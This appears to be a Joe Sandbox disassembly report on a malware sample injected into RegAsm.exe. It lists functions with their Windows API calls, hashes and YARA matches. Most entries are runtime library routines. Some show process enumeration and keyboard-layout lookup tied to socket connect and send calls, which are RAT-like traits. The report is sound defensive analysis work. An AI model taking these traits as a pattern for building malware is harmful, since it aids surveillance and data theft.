                                                                                • Instruction ID: 3099d3b49c49d1df3d44327ff87017ee7d1b0803ff7cdb2815dc6b7c28d9377e
                                                                                • Opcode Fuzzy Hash: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                                                • Instruction Fuzzy Hash: B6E04872504315E7E31027B5EC4DCAB7B7CE745613B100266FA16915D39A749C41C6B5
                                                                                Function 004413EA Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                                                                                • Instruction ID: 15e211ccade7fc2a5debfa8ad78d9bfa955d5b29a73147504924d067d3782226
                                                                                • Opcode Fuzzy Hash: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                                                                                • Instruction Fuzzy Hash: 2771D4319012569BEB21CF55C884AFFBB75EF55310F19412BE815672A0DB78CCC1CBA8
                                                                                Function 004493E5 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                                                                • _free.LIBCMT ref: 0044943D
                                                                                  • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                • _free.LIBCMT ref: 00449609
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                • String ID:
                                                                                • API String ID: 1286116820-0
                                                                                • Opcode ID: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                                                                • Instruction ID: 45cf5ea20785abb2a7eec221213eb08c1b8584214e6df16efc40294c4842d026
                                                                                • Opcode Fuzzy Hash: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                                                                • Instruction Fuzzy Hash: 1B51EC71900205ABEB14EF69DD819AFB7B8EF44724F20066FE418D3291EB789D41DB58
                                                                                Function 0040F938 Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                                  • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F956
                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 0040F97A
                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F989
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040FB40
                                                                                  • Part of subcall function 0041C076: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F634,00000000,?,?,00475338), ref: 0041C08B
                                                                                  • Part of subcall function 0041C076: IsWow64Process.KERNEL32(00000000,?,?,?,00475338), ref: 0041C096
                                                                                  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                                  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FB31
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                                • String ID:
                                                                                • API String ID: 2180151492-0
                                                                                • Opcode ID: f543a937552f8da93e04a19db783a22fe456a5d43be0b6fbf0d05b22cfeed181
                                                                                • Instruction ID: d02cab962e177bd28921c4f9a71df23b762ba7d31cecf8da060328e0f3db66c6
                                                                                • Opcode Fuzzy Hash: f543a937552f8da93e04a19db783a22fe456a5d43be0b6fbf0d05b22cfeed181
                                                                                • Instruction Fuzzy Hash: 5F4136311083419BC325F722DC51AEFB3A5AF94305F50493EF58A921E2EF385A49C65A
                                                                                Function 00443E99 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free
                                                                                • String ID:
                                                                                • API String ID: 269201875-0
                                                                                • Opcode ID: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                                                • Instruction ID: bbec49e9ccdd5c2af131aecc9b6810ea24321c3eb42f74c08fbdd36582e243a3
                                                                                • Opcode Fuzzy Hash: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                                                • Instruction Fuzzy Hash: 5F41E232E00200AFEB14DF78C881A5EB3B5EF89B18F1545AEE915EB351D735AE05CB84
                                                                                Function 004511AC Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92), ref: 004511F9
                                                                                • __alloca_probe_16.LIBCMT ref: 00451231
                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?), ref: 00451282
                                                                                • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?,00000002,00000000), ref: 00451294
                                                                                • __freea.LIBCMT ref: 0045129D
                                                                                  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                • String ID:
                                                                                • API String ID: 313313983-0
                                                                                • Opcode ID: 695a5f3fdf384fa9d4863fe56c7c43b71593cfbe7e8d533d6dff3d4dffab5c55
                                                                                • Instruction ID: f723c28c07ecd650b398e20bb728631ced1c531215915adb10fa1f31571a6cea
                                                                                • Opcode Fuzzy Hash: 695a5f3fdf384fa9d4863fe56c7c43b71593cfbe7e8d533d6dff3d4dffab5c55
                                                                                • Instruction Fuzzy Hash: F7310331A0020AABDF249F65DC41EAF7BA5EB04701F0445AAFC08E72A2E739CC55CB94
                                                                                Function 0044F3DA Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 0044F3E3
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F406
                                                                                  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F42C
                                                                                • _free.LIBCMT ref: 0044F43F
                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F44E
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                • String ID:
                                                                                • API String ID: 336800556-0
                                                                                • Opcode ID: 5a321bf6ad982bb41f22afd847bffa7b7f2aa598f804dd442cdb837d811de21f
                                                                                • Instruction ID: b6d7bf627ac8e1e23e8e90154f8049d5dc13ee9613ce4caf203d647ba434722a
                                                                                • Opcode Fuzzy Hash: 5a321bf6ad982bb41f22afd847bffa7b7f2aa598f804dd442cdb837d811de21f
                                                                                • Instruction Fuzzy Hash: 2401DF72602721BF37211ABB5C8DC7F6AACDEC6FA5355013AFD04D2202DE688D0691B9
                                                                                Function 10007153 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                                                                                  • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
                                                                                • _free.LIBCMT ref: 100071B8
                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                • String ID:
                                                                                • API String ID: 336800556-0
                                                                                • Opcode ID: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                                • Instruction ID: fdf90bdbf822fabaf3dd9d310e80898d5fc59248e37e3ebe61ec6e18e74c85b1
                                                                                • Opcode Fuzzy Hash: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                                • Instruction Fuzzy Hash: 6601D872A01225BB73129BBE5C8CDBF2A6DFBC69E0311012AFD0CC7288DB658C0181B0
                                                                                Function 00448319 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLastError.KERNEL32(?,00000000,00000000,0043BCD6,00000000,00000000,?,0043BD5A,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044831E
                                                                                • _free.LIBCMT ref: 00448353
                                                                                • _free.LIBCMT ref: 0044837A
                                                                                • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448387
                                                                                • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448390
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$_free
                                                                                • String ID:
                                                                                • API String ID: 3170660625-0
                                                                                • Opcode ID: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                                                                                • Instruction ID: 5af5a014564f127a9d6b3613d5887cb4baea3ca98ff5bc54bcf39f1731b7af1a
                                                                                • Opcode Fuzzy Hash: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                                                                                • Instruction Fuzzy Hash: 3401F936100B006BB7117A2A5C45E6F3259DBD2B75B35093FFD1892292EF7ECC02812D
                                                                                Function 10005B7A Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
                                                                                • _free.LIBCMT ref: 10005BB4
                                                                                • _free.LIBCMT ref: 10005BDB
                                                                                • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
                                                                                • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$_free
                                                                                • String ID:
                                                                                • API String ID: 3170660625-0
                                                                                • Opcode ID: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                                • Instruction ID: a404960836b3e2f032ab47abdd1028028b52a365ddf0c47563f665e512f3cffd
                                                                                • Opcode Fuzzy Hash: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                                • Instruction Fuzzy Hash: 5501F47A108A52A7F202E7345C85E1F3AAEDBC55F37220025FD19A615EEF73FD024164
                                                                                Function 0041C26E Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                                • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                                • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041C2B9
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0041C2C4
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0041C2CC
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$CloseHandleOpen$FileImageName
                                                                                • String ID:
                                                                                • API String ID: 2951400881-0
                                                                                • Opcode ID: e1074fac5642d3b73ea46f905cbac139ffb473db2c7b30d838fbef5372722d9f
                                                                                • Instruction ID: 82f86893bb8475317186349f6084970b7a3011258d8579340058f5d8518f4318
                                                                                • Opcode Fuzzy Hash: e1074fac5642d3b73ea46f905cbac139ffb473db2c7b30d838fbef5372722d9f
                                                                                • Instruction Fuzzy Hash: 9C01F231680215ABD61066949C8AFA7B66C8B84756F0001ABFA08D22A2EF74CD81466A
                                                                                Function 10001E89 Relevance: 7.5, APIs: 5, Instructions: 41stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                • lstrcatW.KERNEL32(?,?), ref: 10001EAC
                                                                                • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                • lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: lstrlen$lstrcat
                                                                                • String ID:
                                                                                • API String ID: 493641738-0
                                                                                • Opcode ID: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                • Instruction ID: f5d9027fafc921fe84ae6627056796c55de3fa1ad923a59450c5185d8ca5453c
                                                                                • Opcode Fuzzy Hash: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                • Instruction Fuzzy Hash: D8F082261002207AF621772AECC5FBF7B7CEFC6AA0F04001AFA0C83194DB54684292B5
                                                                                Function 00450A3C Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _free.LIBCMT ref: 00450A54
                                                                                  • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                • _free.LIBCMT ref: 00450A66
                                                                                • _free.LIBCMT ref: 00450A78
                                                                                • _free.LIBCMT ref: 00450A8A
                                                                                • _free.LIBCMT ref: 00450A9C
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                                • Instruction ID: 72fff71e7c38304dd33e0b5962bcef44c8ad6e5fbb3f6de42623dcf71f8de19c
                                                                                • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                                • Instruction Fuzzy Hash: F7F012765053006B9620EB5DE883C1773D9EA157117A68C1BF549DB652C778FCC0866C
                                                                                Function 100091B8 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _free.LIBCMT ref: 100091D0
                                                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                • _free.LIBCMT ref: 100091E2
                                                                                • _free.LIBCMT ref: 100091F4
                                                                                • _free.LIBCMT ref: 10009206
                                                                                • _free.LIBCMT ref: 10009218
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                • Opcode ID: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                • Instruction ID: a08e021c65853776c99c3fd86fadada58ae96d962e635c5153d22f52a77de1c5
                                                                                • Opcode Fuzzy Hash: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                • Instruction Fuzzy Hash: 77F06DB161C650ABE664DB58EAC6C4B7BEDFB003E13608805FC4DD7549CB31FC809A64
                                                                                Function 004440E8 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _free.LIBCMT ref: 00444106
                                                                                  • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                • _free.LIBCMT ref: 00444118
                                                                                • _free.LIBCMT ref: 0044412B
                                                                                • _free.LIBCMT ref: 0044413C
                                                                                • _free.LIBCMT ref: 0044414D
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                                • Instruction ID: 0e9c2896d1a2baf17e4b980eca3efa8a556ca0a6e45d827b59e8921ed08f8926
                                                                                • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                                • Instruction Fuzzy Hash: 91F03AB18025208FA731AF2DBD528053BA1A705720356853BF40C62A71C7B849C2DFDF
                                                                                Function 10005351 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _free.LIBCMT ref: 1000536F
                                                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                • _free.LIBCMT ref: 10005381
                                                                                • _free.LIBCMT ref: 10005394
                                                                                • _free.LIBCMT ref: 100053A5
                                                                                • _free.LIBCMT ref: 100053B6
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                • Opcode ID: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                                • Instruction ID: ba906e9feca9bc6e71cd1aa5ebacb8f64a9f241ffe6b13fedf7f16c4e4854dfa
                                                                                • Opcode Fuzzy Hash: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                                • Instruction Fuzzy Hash: 38F0F478C18934EBF741DF28ADC140A3BB5F718A91342C15AFC1497279DB36D9429B84
                                                                                Function 0044E769 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _strpbrk.LIBCMT ref: 0044E7B8
                                                                                • _free.LIBCMT ref: 0044E8D5
                                                                                  • Part of subcall function 0043BD68: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0043BD6A
                                                                                  • Part of subcall function 0043BD68: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BD8C
                                                                                  • Part of subcall function 0043BD68: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BD93
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                                • String ID: *?$.
                                                                                • API String ID: 2812119850-3972193922
                                                                                • Opcode ID: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                                                • Instruction ID: bbc13fc8ee10fdca904a4e9292213e09ebfa005f106ef5a16faeda3ce4fd08f7
                                                                                • Opcode Fuzzy Hash: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                                                • Instruction Fuzzy Hash: C251B175E00209AFEF14DFAAC881AAEF7B5FF58314F24416EE844E7341E6399A018B54
                                                                                Function 00409EDE Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 157COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetKeyboardLayoutNameA.USER32(?), ref: 00409F0E
                                                                                  • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,00C24830,00000010), ref: 004048E0
                                                                                  • Part of subcall function 0041C5A6: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041C5BB
                                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
